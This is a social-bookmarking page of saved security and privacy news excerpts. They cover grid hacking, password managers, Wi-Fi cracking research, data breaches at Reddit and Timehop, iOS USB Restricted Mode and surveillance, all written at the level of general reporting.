rgl7194 + security   3132

Hacking The Electric Grid Is Damned Hard | FiveThirtyEight
The nightmare is easy enough to imagine. Nefarious baddies sit in a dark room, illuminated by the green glow of a computer screen. Meanwhile, technicians watch in horror from somewhere in the Midwest as they lose control of their electrical systems. And, suddenly, hundreds of thousands, even millions of Americans are plunged into darkness.
That scene was evoked in recent weeks as federal security experts at the Department of Homeland Security warned that state-sponsored hackers have targeted more than American elections — they’re after the electric grid, too. They’ve gotten “to the point where they could have thrown switches,” a DHS official told The Wall Street Journal. Both DHS and the FBI have linked these attacks to Russia — which was already pinned as the culprit in two attacks that shut down power to hundreds of thousands of people in Ukraine two Decembers in a row, in 2015 and 2016. It’s all very urgent — a high-risk crisis that must be solved immediately.
security  hack  electric  538 
5 days ago by rgl7194
How I Use 1Password – The Sweet Setup
What’s in my 1Password
Now, it’s been a while since I set up a brand new Mac, or since I erased my Mac in order to install the latest OS on a clean slate, or since I set up a new iPhone from scratch rather than an iCloud backup.
But… my point is that when setting up a new computer or iOS device, 1Password is among the very first apps I install.
A brief perusal through my 1Password library, and I can see that I’ve been using this app for nearly 10 years. I’ve got some passwords in here (for old websites I don’t use any longer) that were created as early as December 2008. They’ve been modified since then, of course.
1Password holds the login information to every single website and service that I use. From my personal bank to my business website hosting to my favorite online photo printer. And that’s just the start. Heck, I even have a login for my thermostat.
Here’s a quick look at what all I store in 1Password and why it’s so helpful.
1password  privacy  security  passwords  credit_cards  2FA  family  legacy  cars 
7 days ago by rgl7194
Researchers Developed Artificial Intelligence-Powered Stealthy Malware
Artificial Intelligence (AI) has been seen as a potential solution for automatically detecting and combating malware, and stop cyber attacks before they affect any organization.
However, the same technology can also be weaponized by threat actors to power a new generation of malware that can evade even the best cyber-security defenses and infects a computer network or launch an attack only when the target's face is detected by the camera.
To demonstrate this scenario, security researchers at IBM Research came up with DeepLocker—a new breed of "highly targeted and evasive" attack tool powered by AI," which conceals its malicious intent until it reached a specific victim.
According to the IBM researcher, DeepLocker flies under the radar without being detected and "unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition."
security  privacy  malware  AI/ML  facial_recognition  IBM  research 
7 days ago by rgl7194
New facial recognition tool tracks targets across social networks - The Verge
The open-source program is designed for security researchers
Today, researchers at Trustwave released a new open-source tool called Social Mapper, which uses facial recognition to track subjects across social media networks. Designed for security researchers performing social engineering attacks, the system automatically locates profiles on Facebook, Instagram, Twitter, LinkedIn, and other networks based on a name and picture.
Those searches can already be performed manually, but the automated process means it can be performed far faster and for many people at once. “Performing intelligence gathering online is a time-consuming process,” Trustwave explained in a post this morning. “What if it could be automated and done on a mass scale with hundreds or thousands of individuals?”
security  privacy  facial_recognition  social_media  open_source  software 
7 days ago by rgl7194
HTTP Security Considerations - An Introduction To HTTP Basics
HTTP is ubiquitous now with pretty much everything being powered by an API, a web application or some kind of cloud-based HTTP driven infrastructure. With that HTTP Security becomes paramount and to secure HTTP you have to understand it.
HTTP is the protocol that powers the web and to penetrate via a web service it pays to have a good solid foundational understanding of HTTP, how it works and the common response codes – many of which can lead to some kind of vulnerability which is exploitable.
HTTP/S  101  security  privacy  web 
7 days ago by rgl7194
Sextortion Scam Uses Recipient’s Hacked Passwords — Krebs on Security
Here’s a clever new twist on an old email scam that could serve to make the con far more believable. The message purports to have been sent from a hacker who’s compromised your computer and used your webcam to record a video of you while you were watching porn. The missive threatens to release the video to all your contacts unless you pay a Bitcoin ransom. The new twist? The email now references a real password previously tied to the recipient’s email address.
The basic elements of this sextortion scam email have been around for some time, and usually the only thing that changes with this particular message is the Bitcoin address that frightened targets can use to pay the amount demanded. But this one begins with an unusual opening salvo:
“I’m aware that <substitute password formerly used by recipient here> is your password,” reads the salutation...
email  mac  porn  privacy  security  social_engineering  krebs 
8 days ago by rgl7194
You could have invented that Bluetooth attack | Trail of Bits Blog
A serious bluetooth bug has received quite a bit of attention lately. It’s a great find by Biham and Newman. Given BLE’s popularity in the patch-averse IoT world, the bug has serious implications. And yet, it’s remarkably clean and simple. Unlike many elliptic curve bugs, an average human can totally understand the bug and how it can be exploited. It’s a cool application of a conceptually approachable attack.
This post describes the bug, how to exploit them, and how that specifically happened with the bluetooth protocol. But first, let’s take a crash course in elliptic curves and invalid curve point attacks.
bluetooth  bug  security  privacy  hack  math 
8 days ago by rgl7194
Identifying People by Metadata - Schneier on Security
Interesting research: "You are your Metadata: Identification and Obfuscation of Social Media Users using Metadata Information," by Beatrice Perez, Mirco Musolesi, and Gianluca Stringhini.
Abstract: Metadata are associated to most of the information we produce in our daily interactions and communication in the digital world. Yet, surprisingly, metadata are often still categorized as non-sensitive. Indeed, in the past, researchers and practitioners have mainly focused on the problem of the identification of a user from the content of a message.
privacy  metadata  ID  security 
10 days ago by rgl7194
How to get away with financial fraud | News | The Guardian
Some of the world’s biggest scandals have gone unspotted for years. The nature of fraud is that it works outside our field of vision. By Dan Davies
‘Guys, you’ve got to hear this,” I said. I was sitting in front of my computer one day in July 2012, with one eye on a screen of share prices and the other on a live stream of the House of Commons Treasury select committee hearings. As the Barclays share price took a graceful swan dive, I pulled my headphones out of the socket and turned up the volume so everyone could hear. My colleagues left their terminals and came around to watch BBC Parliament with me.
It didn’t take long to realise what was happening. “Bob’s getting murdered,” someone said.
finances  corruption  security  crime  money 
10 days ago by rgl7194
On Financial Fraud - Schneier on Security
There are some good lessons in this article on financial fraud:
That's how we got it so wrong. We were looking for incidental breaches of technical regulations, not systematic crime. And the thing is, that's normal. The nature of fraud is that it works outside your field of vision, subverting the normal checks and balances so that the world changes while the picture stays the same. People in financial markets have been missing the wood for the trees for as long as there have been markets.
finances  corruption  security  crime  money 
10 days ago by rgl7194
WPA3 - Schneier on Security
Everyone is writing about the new WPA3 Wi-Fi security standard, and how it improves security over the current WPA2 standard.
This summary is as good as any other:
The first big new feature in WPA3 is protection against offline, password-guessing attacks. This is where an attacker captures data from your Wi-Fi stream, brings it back to a private computer, and guesses passwords over and over again until they find a match. With WPA3, attackers are only supposed to be able to make a single guess against that offline data before it becomes useless; they'll instead have to interact with the live Wi-Fi device every time they want to make a guess. (And that's harder since they need to be physically present, and devices can be set up to protect against repeat guesses.)
WPA3's other major addition, as highlighted by the Alliance, is forward secrecy. This is a privacy feature that prevents older data from being compromised by a later attack. So if an attacker captures an encrypted Wi-Fi transmission, then cracks the password, they still won't be able to read the older data -- they'd only be able to see new information currently flowing over the network.
Note that we're just getting the new standard this week. Actual devices that implement the standard are still months away.
wi-fi  security  privacy  WPA3 
10 days ago by rgl7194
Free Facial Recognition Tool Can Track People Across Social Media Sites
Security researchers at Trustwave have released a new open-source tool that uses facial recognition technology to locate targets across numerous social media networks on a large scale.
Dubbed Social Mapper, the facial recognition tool automatically searches for targets across eight social media platforms, including—Facebook, Instagram, Twitter, LinkedIn, Google+, the Russian social networking site VKontakte, and China's Weibo and Douban—based on their names and pictures.
The tool's creators claim they developed Social Mapper intelligence-gathering tool predominantly to help pen testers and red teamers with social engineering attacks.
social_media  facial_recognition  open_source  software  security  privacy 
10 days ago by rgl7194
Google: Security Keys Neutralized Employee Phishing — Krebs on Security
Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes, the company told KrebsOnSecurity.
A YubiKey Security Key made by Yubico. The basic model featured here retails for $20.
Security Keys are inexpensive USB-based devices that offer an alternative approach to two-factor authentication (2FA), which requires the user to log in to a Web site using something they know (the password) and something they have (e.g., a mobile device).
A Google spokesperson said Security Keys now form the basis of all account access at Google.
google  USB  security  privacy  2FA  krebs 
10 days ago by rgl7194
Google Employees Use a Physical Token as Their Second Authentication Factor - Schneier on Security
Krebs on Security is reporting that all 85,000 Google employees use two-factor authentication with a physical token.
A Google spokesperson said Security Keys now form the basis of all account access at Google.
"We have had no reported or confirmed account takeovers since implementing security keys at Google," the spokesperson said. "Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time."
Now Google is selling that security to its users:
On Wednesday, the company announced its new Titan security key, a device that protects your accounts by restricting two-factor authentication to the physical world. It's available as a USB stick and in a Bluetooth variation, and like similar products by Yubico and Feitian, it utilizes the protocol approved by the FIDO alliance. That means it'll be compatible with pretty much any service that enables users to turn on Universal 2nd Factor Authentication (U2F).
google  USB  security  privacy  2FA 
10 days ago by rgl7194
Titan Security Keys – Google launches its own USB-based FIDO U2F Keys
At Google Cloud Next '18 convention in San Francisco, the company has introduced Titan Security Keys—a tiny USB device, similar to Yubico's YubiKey, that offers hardware-based two-factor authentication for your online accounts with the highest level of protection against phishing attacks.
These hardware-based security keys are thought to be more efficient at preventing phishing, man-in-the-middle (MITM) and other types of account-takeover attacks than 2FA via SMS, as even if your credentials are compromised, account login is impossible without that physical key.
Earlier this week Google revealed that its 85,000 employees have been using physical security keys internally for months and since then none of them have fallen victim to phishing attacks.
Compared with the traditional authentication protocols (SMS messages), Universal 2nd Factor Authentication (U2F) is extremely difficult to compromise that aims to simplify, fasten and secure two-factor authentication process.
google  USB  security  privacy  2FA 
10 days ago by rgl7194
iOS Lock Screen: Guide to Keep Data off Your iPhone Lock Screen | The Mac Security Blog
We use our iOS devices to keep us up to date on important information. With notifications that can display on your iPhone lock screen, you can see who's emailed you, important messages, and much more. But with the default iOS settings, sometimes private data that you don't want others to see can display on your lock screen, and anyone who can see your iPhone or iPad can potentially access personal information on your iPhone, even if it's locked.
This means if your iPhone is lost or stolen, whoever has your iOS device will not need your passcode to look at the information that displays on the iOS lock screen. Even someone who randomly walks by your phone when you're not there could potentially see sensitive information displayed on it while it's locked.
Fortunately, Apple's iOS contains a number of privacy settings to control what data can display on your lock screen, but many people ignore these options. Want to keep your sensitive information private? In this guide, we'll show you what you can control and how to change these settings to keep private data off your iPhone lock screen.
iphone  homescreen  security  privacy  ios 
10 days ago by rgl7194
New Method Simplifies Cracking WPA/WPA2 Passwords on 802.11 Networks
A new technique has been discovered to easily retrieve the Pairwise Master Key Identifier (PMKID) from a router using WPA/WPA2 security, which can then be used to crack the wireless password of the router. While previous WPA/WPA2 cracking methods required an attacker to wait for a user to login to a wireless network and capture a full authentication handshake, this new method only requires a single frame which the attacker can request from the AP because it is a regular part of the protocol.
This new method was discovered by Jens "atom" Steube, the developer of the popular Hashcat password cracking tool, when looking for new ways to crack the WPA3 wireless security protocol. According to Steube, this method will work against almost all routers utilizing 802.11i/p/q/r networks with roaming enabled.
This method works by extracting the RSN IE (Robust Security Network Information Element) from a single EAPOL frame. The RSN IE is a optional field that contains the Pairwise Master Key Identifier (PMKID) generated by a router when a user tries to authenticate.
security  privacy  wi-fi  hack  router 
10 days ago by rgl7194
In-vehicle wireless devices are endangering emergency first responders | Ars Technica
Gateways are supposed to make cops safer. Many leak their locations in real time.
In late 2016, security researcher Justin Shattuck was on assignment for an organization that was under a crippling denial-of-service attack by a large number of devices, some of which appeared to be hosted inside the network of a large European airport. As he scanned the airport’s network from the Internet—and later, with the airport operators’ permission, from inside the network—he was eventually able to confirm that the devices were indeed part of several previously unseen botnets that were delivering record-setting denial-of-service attacks on websites.
One of the infected devices was a wireless gateway from Sierra Wireless. Authorized IT administrators used it to connect to the airport network in the event that primary connection methods failed. Surprised that such a sensitive piece of equipment could become a foot soldier in a denial-of-service attack, Shattuck began to investigate. What he found shocked him. Not only did an Internet scan show that 40,000 such gateways were running in other networks, but a large percentage of them were exposing a staggering amount of sensitive data about the networks they were connected to.
IoT  emergency  police  security  privacy  hack  botnet  IT/IS 
10 days ago by rgl7194
Reddit Breach Highlights Limits of SMS-Based Authentication — Krebs on Security
Reddit.com today disclosed that a data breach exposed some internal data, as well as email addresses and passwords for some Reddit users. As Web site breaches go, this one doesn’t seem too severe. What’s interesting about the incident is that it showcases once again why relying on mobile text messages (SMS) for two-factor authentication (2FA) can lull companies and end users into a false sense of security.
In a post to Reddit, the social news aggregation platform said it learned on June 19 that between June 14 and 18 an attacker compromised a several employee accounts at its cloud and source code hosting providers.
Reddit said the exposed data included internal source code as well as email addresses and obfuscated passwords for all Reddit users who registered accounts on the site prior to May 2007. The incident also exposed the email addresses of some users who had signed up to receive daily email digests of specific discussion threads.
security  privacy  breach  hack  2FA  data  krebs 
11 days ago by rgl7194
Reddit Hacked – Emails, Passwords, Private Messages Stolen
Another day, another significant data breach.
This time the victim is Reddit... seems someone is really pissed off with Reddit's account ban policy or bias moderators.
Reddit social media network today announced that it suffered a security breach in June that exposed some of its users' data, including their current email addresses and an old 2007 database backup containing usernames and hashed passwords.
According to Reddit, the unknown hacker(s) managed to gain read-only access to some of its systems that contained its users' backup data, source code, internal logs, and other files.
security  privacy  breach  hack  2FA  data 
11 days ago by rgl7194
Reddit Announces Security Breach After Hackers Bypassed Staff's 2FA
Reddit announced today a security breach. The social platform says a hacker(s) breached the accounts of several employees after bypassing two-factor authentication (2FA) and stole information such as some email addresses, logs, and a 2007 database backup containing old salted and hashed password.
The hack took place between June 14 and June 18. Reddit said it discovered the breach the next day, on June 19.
Reddit said the hacker never got "write access" to its servers.
"They were not able to alter Reddit information, and we have taken steps since the event to further lock down and rotate all production secrets and API keys, and to enhance our logging and monitoring systems," the company said.
security  privacy  breach  hack  2FA  data 
11 days ago by rgl7194
Apple’s Quick Look Reveals Your Darkest Secrets | The Mac Security Blog
For more than a decade, macOS has included a feature called Quick Look that makes it easy to preview files right within the Finder, without having to launch an app.
While Quick Look can certainly be a useful feature, its implementation in macOS has some surprising and potentially disturbing privacy implications.
Let's take a look at why the feature may be problematic and what you can do to safeguard your private data.
mac  security  privacy  preview  macosxhints  filevault 
11 days ago by rgl7194
Everybody and their mother is blocking ads, so why aren’t you? - Malwarebytes Labs | Malwarebytes Labs
This post may ruffle a few feathers. But we’re not here to offer advice to publishers on how to best generate revenue for their brand. Rather, we’re here to offer the best advice on how to maintain a safe and secure environment.
If you’re not blocking advertisements on your PC and mobile device, you should be! And if you know someone who isn’t blocking ads, then forward this post to them. Because in this two-part series, we’re going to dispel some of the myths surrounding ad blocking, and we’ll cover the reasons you should be blocking ads on your network and devices.
Part 2 of this series concludes by discussing common tools and configurations to show you How to block ads like a pro.
You’ve heard the talk and seen the messages in online banners. You’re aware of the disputes and the provocation from publishers and advertisers that ad blocking is a morally unconscionable act whose users deserve outright banishment from the web. Maybe you’ve been swayed by the pleas from website owners and have empathy towards the fragile budgetary constraints of your favorite sites. Or maybe you don’t understand the risks associated with online tracking and advertising and think that if you don’t click ads you’ll be fine.
security  privacy  adblock  malware  tracking 
11 days ago by rgl7194
Researcher Discloses Potential Brute Force Attack on iPhone; Apple Says It's Not Real - SecureMac
A strong passcode is one of the most important elements of personal security on iOS devices. While it has been some time since Apple introduced the stronger six-digit passcodes (which they now recommend), many people continue to use the four-digit PIN. According to one recent report by a security researcher, the iPhone could be vulnerable to an extremely simple brute force attack which would render those four digits useless. However, Apple has since taken the public stance that the vulnerability as described does not exist. What’s going on here?
In a video posted by the researcher, Matthew Hickey, he demonstrates an attack using the iPhone’s USB connection to send password attempts to the device. Instead of sending each string individually (e.g., 0000, then 0001, then 0002), every possible combination all the way up to 9999 is sent to the phone en masse. According to Hickey, iOS becomes overwhelmed, and the string takes priority over any other system functions. It then tries each one, supposedly bypassing both the lock and the setting that erases the device after ten failures. At first glance, this would seem to be a serious and extremely simple attack to execute.
encryption  ios11  iphone  privacy  security  USB 
11 days ago by rgl7194
White hat, black hat, and the emergence of the gray hat: the true costs of cybercrime - Malwarebytes Labs | Malwarebytes Labs
Osterman Research recently completed a major survey on behalf of Malwarebytes to determine the actual cost of cybercrime to businesses. Many studies have focused on the cost of lost reputation, lost future business, and other consequences of cybercrime—and while these are certainly valid considerations—we wanted to understand the direct costs of cybercrime. To do so, we surveyed mid-sized and large organizations on a variety of issues, but focused on three cost components:
Security budgets
The cost of remediating “major” events, e.g., events like a widespread ransomware infection or major data breach that would be highly disruptive to an organization and might take it offline for some period of time
The cost of cybercrime perpetrated by “gray hats;” those employees who dabble in cybercrime without giving up their day job as a security professional
Here’s what we discovered...
cybercrime  security  privacy 
11 days ago by rgl7194
Porn Blackmail Scam Rattles Mac Users: What You Need to Know | The Mac Security Blog
Our experiences online today seem, at times, much like life was probably like in the Wild West about 145 years ago. Today, online thieves are out to get as much from you as possible. And when you connect to the Internet, you're vulnerable to malware and hackers — it simply does not matter what computer or operating system you're using.
The latest trick up cybercriminal's sleeves is a ploy utilizing a mix of social engineering and blackmail, a scam via email from someone claiming to have hacked your computer's webcam and recorded your activities while you allegedly watched porn. The email claims you downloaded their virus while watching porn, siphoning your contacts, and they threaten to send the video of you to all of your friends, family and coworkers — unless you pay a ransom in Bitcoin (BTC) digital currency. (We've seen demands of anywhere between $300 to $3,000 USD or higher.)
Although such schemes have been widespread in various parts of the world — Australia and the Middle East — we have recently seen these showing up in large numbers across the United States. For this reason, we feel it's important to clarify a few things and provide assistance on the best way to protect yourself.
security  privacy  mac  email  porn  social_engineering 
11 days ago by rgl7194
Social engineering attacks: What makes you susceptible? - Malwarebytes Labs | Malwarebytes Labs
We now live in a world where holding the door open for someone balancing a tray of steaming hot coffee—she can’t seem to get her access card out to place it near the reader—is something we need to think twice about. Courtesy isn’t dead, mind you, but in this case, you’d almost wish it were. Because the door opens to a restricted facility. Do you let her in? If she really can’t reach her card, the answer is clearly yes. But what if there’s something else going on?
Holding the door open for people in need of assistance is considered common courtesy. But when someone assumes the role of a distressed woman to count on your desire to help, your thoughtful gesture suddenly becomes a dangerous one. Now, you’ve just made it easier for someone to get into a restricted facility they otherwise had no access or right to. So what does that make you? A victim of social engineering.
Social engineering is a term you often hear IT pros and cybersecurity experts use when talking about Internet threats like phishing, scams, and even certain kinds of malware, such as ransomware. But its definition is even more broad. Social engineering is the manipulation or the taking advantage of human qualities to serve an attacker’s purpose.
It is imperative, then, that we protect ourselves from such social engineering tactics the same way we protect our devices from malware. With due diligence, we can make it difficult for social engineers to get what they want.
social_engineering  security  privacy 
12 days ago by rgl7194
1Password Implements New Feature to Keep Travelers' Passwords Safe - SecureMac
Over the past several years, international travel has become fraught with more privacy and security concerns than ever before. At many borders, including those in the United States, customs agents are increasingly asking travelers to unlock their phones and hand over their laptops for inspection. Government agencies claim this is an anti-terrorism measure, as well as being aimed at combating fraud and trafficking in illegal materials. For many, this feels like an invasion of privacy.
For those with password managers on their devices, this is an especially big concern. When traveling overseas, putting your passwords at risk is wholly unacceptable, especially for individuals such as journalists. 1Password, one of the most popular management apps, has chosen to take a proactive step towards making it easier to protect your passwords from prying eyes while traveling.
1password  passwords  travel  security  privacy 
12 days ago by rgl7194
1Password's Travel Mode - Schneier on Security
The 1Password password manager has just introduced "travel mode," which allows you to delete your stored passwords when you're in other countries or crossing borders:
Your vaults aren't just hidden; they're completely removed from your devices as long as Travel Mode is on. That includes every item and all your encryption keys. There are no traces left for anyone to find. So even if you're asked to unlock 1Password by someone at the border, there's no way for them to tell that Travel Mode is even enabled.
In 1Password Teams, Travel Mode is even cooler. If you're a team administrator, you have total control over which secrets your employees can travel with. You can turn Travel Mode on and off for your team members, so you can ensure that company information stays safe at all times.
The way this works is important. If the scary border police demand that you unlock your 1Password vault, those passwords/keys are not there for the border police to find.
The only flaw -- and this is minor -- is that the system requires you to lie. When the scary border police ask you "do you have any other passwords?" or "have you enabled travel mode," you can't tell them the truth. In the US, lying to a federal office is a felony.
I previously described a system that doesn't require you to lie. It's more complicated to implement, though.
This is a great feature, and I'm happy to see it implemented.
1password  passwords  travel  security  privacy 
12 days ago by rgl7194
Tech Support Scams Using Call Optimization Services to Insert Phone Numbers
New research shows that browser based Tech Support Scams are starting to utilize services normally found in legitimate call center operations. These services, called call optimization services, are typically used by call centers to perform call load balancing, call routing, dynamic generation of phone numbers, and more.
When a visitor accesses a browser-based tech support scam, the page typically utilizes some sort of behavior that makes it difficult to close the page. This could be a form, as shown above, display notification dialogs, entering full screen mode, or a javascript routine that causes the screen to become unresponsive.
This is done to scare a visitor into calling the listed phone numbers by keeping the scam on the screen without allowing it to be closed.
security  privacy  technology  support  scam 
12 days ago by rgl7194
Cyrillic Characters Are Favorites for IDN Homograph Attacks
Cyrillic (Russian alphabet) characters are the most common characters used in IDN homograph attacks, according to research published last month by Farsight Security.
IDN stands for internationalized domain name, and is a domain name spelled out using non-Latin characters, such as Cyrillic, Greek, Chinese, or Japanese letters.
IDNs domains have been introduced in 2010, but they have started to catch on only in recent years, as more website owners realized they could own a domain spelled in their native language.
But as the technology became more popular, so did its potential for abuse. One of the most common way IDN support in browsers is being abused is for phishing attacks, where miscreants register websites that use Latin-looking non-Latin characters in an attempt to trick the user into thinking he's navigating on a legitimate website.
This is done by using "confusable" characters, which are letters that look the same and are found in different alphabets. [Full list of Unicode confusable characters, as published by the Unicode Foundation].
URL  unicode  language  security  privacy  cyrillic 
12 days ago by rgl7194
Archive.org Has Created a Decentralized or Dweb Version of Their Site
The Internet Archive, or Archive.org, is a non-profit organization that stores snapshots of web pages and other media so that you can view them at different states in time even if they have been deleted or been changed.  Even though sites like Archive.org exist and content posted on the Internet is typically there forever, lawsuits, censorship, DDOS attacks, and Internet outages could cause content to be removed or become inaccessible.
For these reasons, Archive.org is testing a decentralized version, or DWeb version, of their web site that allows their content to be delivered over peer-to-peer connections with different hosts sharing portions of or the same content. This decentralized version of Archive.org is running on the domain ªªhttps://dweb.me/ or https://dweb.archive.org/ andºº uses a combination of HTTP and peer-to-peer protocols such as yjs, IPFS, WebTorrent, and GUN to deliver the content.
internet  archive  security  backup  p2p 
12 days ago by rgl7194
Ex-NSO Employee Caught Selling Stolen Phone Hacking Tool For $50 Million
A former employee of one of the world's most powerful hacking companies NSO Group has been arrested and charged with stealing phone hacking tools from the company and trying to sell it for $50 million on the Darknet secretly.
Israeli hacking firm NSO Group is mostly known for selling high-tech malware capable of remotely cracking into Apple's iPhones and Google's Android devices to intelligence apparatuses, militaries, and law enforcement around the world.
encryption  ios11  iphone  privacy  security  USB 
12 days ago by rgl7194
Anti-Hack Feature Comes to iOS 11.4.1… But Is It Good Enough? | The Mac Security Blog
Earlier this week, Apple released security updates for all of its major operating systems: macOS, iOS, watchOS, and tvOS.
Interestingly, iOS 11.4.1 includes a surprise: USB Restricted Mode—a somewhat controversial security feature that Apple describes in a separate support article.
What Is USB Restricted Mode?
USB Restricted Mode was first introduced in the iOS 12 beta at Apple's WWDC event in early June. (Related: Why iOS 12 Is Huge for Security and Privacy)
By default, iOS 12—and now iOS 11.4.1—purposely block access to USB devices connected to an iPhone after it has been locked for at least one hour, or if the phone has been put into Emergency SOS mode. After one of those conditions has been met, connecting a device to the Lightning port requires unlocking the phone before the connected device will work.
encryption  ios11  iphone  privacy  security  USB 
12 days ago by rgl7194
USB restricted mode: now you don’t see it, now you do… | Mac Virus
Graham Cluley: New iOS security feature can be defeated by a $39 adapter… sold by Apple – “Unfortunately for Apple, and customers who like to believe that their phone is private, a workaround has been discovered whereby police could prevent an iPhone or iPad entering USB Restricted Mode if they act quickly enough … Researchers at Elcomsoft discovered that the one hour countdown timer can be reset simply by connecting the iPhone to an untrusted USB accessory.” Further commentary from Pierluigi Paganini: Just using a $39 device it is possible to defeat new iOS USB Restricted Mode.
encryption  ios11  iphone  privacy  security  USB 
12 days ago by rgl7194
USB Accessory Can Defeat iOS's New "USB Restricted Mode" Security Feature
With the release of iOS 11.4.1, Apple has finally rolled out a new security feature designed to protect your devices against USB accessories that connect to the data port, making it harder for law enforcement and hackers to break into your iPhone or iPad without your permission.
Dubbed USB Restricted Mode, the feature automatically disables data connection capabilities of the Lightning port on your iPhone or iPad if the device has been locked for an hour or longer, while the port can still be used for device charging.
In other words, every time you lock your iPhone, a countdown timer of an hour gets activated in the background, which if completed, enables the USB restricted mode to prevent unauthorized access to the data port.
encryption  ios11  iphone  privacy  security  USB 
12 days ago by rgl7194
Timehop Hacked — Hackers Stole Personal Data Of All 21 Million Users
And the hacks just keep on coming.
Timehop social media app has been hit by a major data breach on July 4th that compromised the personal data of its more than 21 million users.
Timehop is a simple social media app that collects your old photos and posts from your iPhone, Facebook, Instagram, Twitter and Foursquare and acts as a digital time machine to help you find—what you were doing on this very day exactly a year ago.
The company revealed on Sunday that unknown attacker(s) managed to break into its Cloud Computing Environment and access the data of entire 21 million users, including their names, email addresses, and approximately 4.7 million phone numbers attached to their accounts.
"We learned of the breach while it was still in progress, and were able to interrupt it, but data was taken. Some data was breached," the company wrote in a security advisory posted on its website.
social_media  apps  security  privacy  breach  data  hack 
12 days ago by rgl7194
Timehop Security Breach Affects the Company’s Entire 21 Million Userbase
Timehop, a mobile app that surfaces old social media posts from the same day but from previous years, has announced a security breach affecting its entire userbase of over 21 million users.
Not all users were affected to the same extent. The company said a hacker gained access to its infrastructure and stole details on its users that included usernames, emails, telephone numbers, and access keys.
social_media  apps  security  privacy  breach  data  hack 
12 days ago by rgl7194
Eight AT&T Buildings and Ten Years of Litigation: Shining a Light on NSA Surveillance | Electronic Frontier Foundation
Two reporters recently identified eight AT&T locations in the United States—towering, multi-story buildings—where NSA surveillance occurs on the backbone of the Internet. Their article showed how the agency taps into cables, routers, and switches that handle vast quantities of Internet traffic around the world. Published by The Intercept, the report shines a light on the NSA’s expansive Internet surveillance network housed inside these sometimes-opaque buildings.
EFF has been shining its own light on NSA Internet surveillance for years with our landmark case, Jewel v. NSA. In more than 10 years of litigation, we’ve made significant strides.
internet  privacy  security  gov2.0  NSA  spying  EFF 
12 days ago by rgl7194
Between You, Me, and Google: Problems With Gmail's “Confidential Mode” | Electronic Frontier Foundation
With Gmail’s new design rolled out to more and more users, many have had a chance to try out its new “Confidential Mode.” While many of its features sound promising, what “Confidential Mode” provides isn’t confidentiality. At best, the new mode might create expectations that it fails to meet around security and privacy in Gmail. We fear that Confidential Mode will make it less likely for users to find and use other, more secure communication alternatives. And at worst, Confidential Mode will push users further into Google’s own walled garden while giving them what we believe are misleading assurances of privacy and security.
With its new Confidential Mode, Google purports to allow you to restrict how the emails you send can be viewed and shared: the recipient of your Confidential Mode email will not be able to forward or print it. You can also set an “expiration date” at which time the email will be deleted from your recipient’s inbox, and even require a text message code as an added layer of security before the email can be viewed.
Unfortunately, each of these “security” features comes with serious security problems for users.
email  gmail  security  privacy  DRM 
12 days ago by rgl7194
How an Ex-Cop Rigged McDonald’s Monopoly Game and Stole Millions
Jerome Jacobson and his network of mobsters, psychics, strip-club owners, and drug traffickers won almost every prize for 12 years, until the FBI launched Operation ‘Final Answer.’
On Aug. 3, 2001, a McDonald’s film crew arrived in the bustling beach town of Westerly, Rhode Island. They carried their cameras and a giant cashier’s check to a row of townhouses, and knocked on the door of Michael Hoover. The 56-year-old bachelor had called a McDonald’s hotline to say he’d won their Monopoly competition. Since 1987, McDonald’s customers had feverishly collected Monopoly game pieces attached to drink cups, french fry packets, and advertising inserts in magazines. By completing groups of properties like Baltic and Mediterranean Avenues, players won cash or a Sega Game Gear, while “Instant Win” game pieces scored a free Filet-O-Fish or a Jamaican vacation. But Hoover, a casino pit boss who had recently filed for bankruptcy, claimed he’d won the grand prize–$1 million.
security  privacy  contest  crime  restaurants 
12 days ago by rgl7194
Hacking the McDonald's Monopoly Sweepstakes - Schneier on Security
Long and interesting story -- now two decades old -- of massive fraud perpetrated against the McDonald's Monopoly sweepstakes. The central fraudster was the person in charge of securing the winning tickets.
security  privacy  contest  crime  restaurants 
12 days ago by rgl7194
Russians Are Targeting Private Election Companies, Too — And States Aren’t Doing Much About It | FiveThirtyEight
The American election system is a textbook example of federalism at work. States administer elections, and the federal government doesn’t have much say in how they do it. While this decentralized system has its benefits, it also means that there’s no across-the-board standard for election system cybersecurity practices. This lack of standardization has become all the more apparent over the past two years: Hackers probed 21 state systems during the lead-up to the 2016 election and gained access to one. But the federal government and states don’t appear to have made great strides to ensure that this doesn’t happen again. To do so, they’d need to deal with not only their own cybersecurity deficits but also those of the private companies that help states administer elections.
Voting machine manufacturers and the makers of election software and electronic poll books (which are lists of eligible voters) are crucially intertwined with state election systems. All states, to some extent or another, rely on these private companies for election products. But despite the central role these companies play, state regulations of them are relatively lax. That’s a problem, especially at a time when these companies are, along with state governments, targets of foreign agents of chaos.
election  gov2.0  politics  state  hack  russia  security  privacy  538 
12 days ago by rgl7194
New Rules to Protect Data Privacy: Where to Focus, What to Avoid | Electronic Frontier Foundation
For many years, EFF has urged technology companies and legislators to do a better job at protecting the privacy of technology users and other members of the public. We hoped the companies, particularly mature players, would realize the importance of implementing meaningful privacy protections. But this year’s Cambridge Analytica scandal, following on the heels of many others, was the last straw.  Corporations are willfully failing to respect the privacy of technology users, and we need new approaches to give them real incentives to do better—and that may include updating our privacy laws.
To be clear, any new regulations must be judicious and narrowly tailored, avoiding tech mandates and expensive burdens that would undermine competition—already a problem in some tech spaces. To accomplish that, policymakers must start by consulting with technologists as well as lawyers.  After the passage of SESTA/FOSTA, we know Congress can be insensitive about the potential consequences of the rules it embraces. Looking to experts would help.
EFF  data  privacy  security  opt-in  sharing  breach  gov2.0 
13 days ago by rgl7194
Explained: What is big data? - Malwarebytes Labs | Malwarebytes Labs
If the pile of manure is big enough, you will find a gold coin in it eventually. This saying is used often to explain why anyone would use big data. Needless to say, in this day and age, the piles of data are so big, you might end up finding a pirate’s treasure.
How big is the pile?
But when is the pile big enough to consider it big data? Per Wikipedia:
“Big data is data sets that are so big and complex that traditional data-processing application software are inadequate to deal with them.”
As a consequence, we can say that it’s not just the size that matters, but the complexity of a dataset. The draw of big data to researchers and scientists, however, is not in its size or complexity, but in how it may be computationally analyzed to reveal patterns, trends, and associations.
When it comes to big data, no mountain is high enough or too difficult to climb. The more data we have to analyze, the more relevant conclusions we may be able to derive. If a dataset is large enough, we can start making predictions about how certain relationships will develop in the future and even find relationships we never suspected to exist.
big_data  data  business  security  privacy 
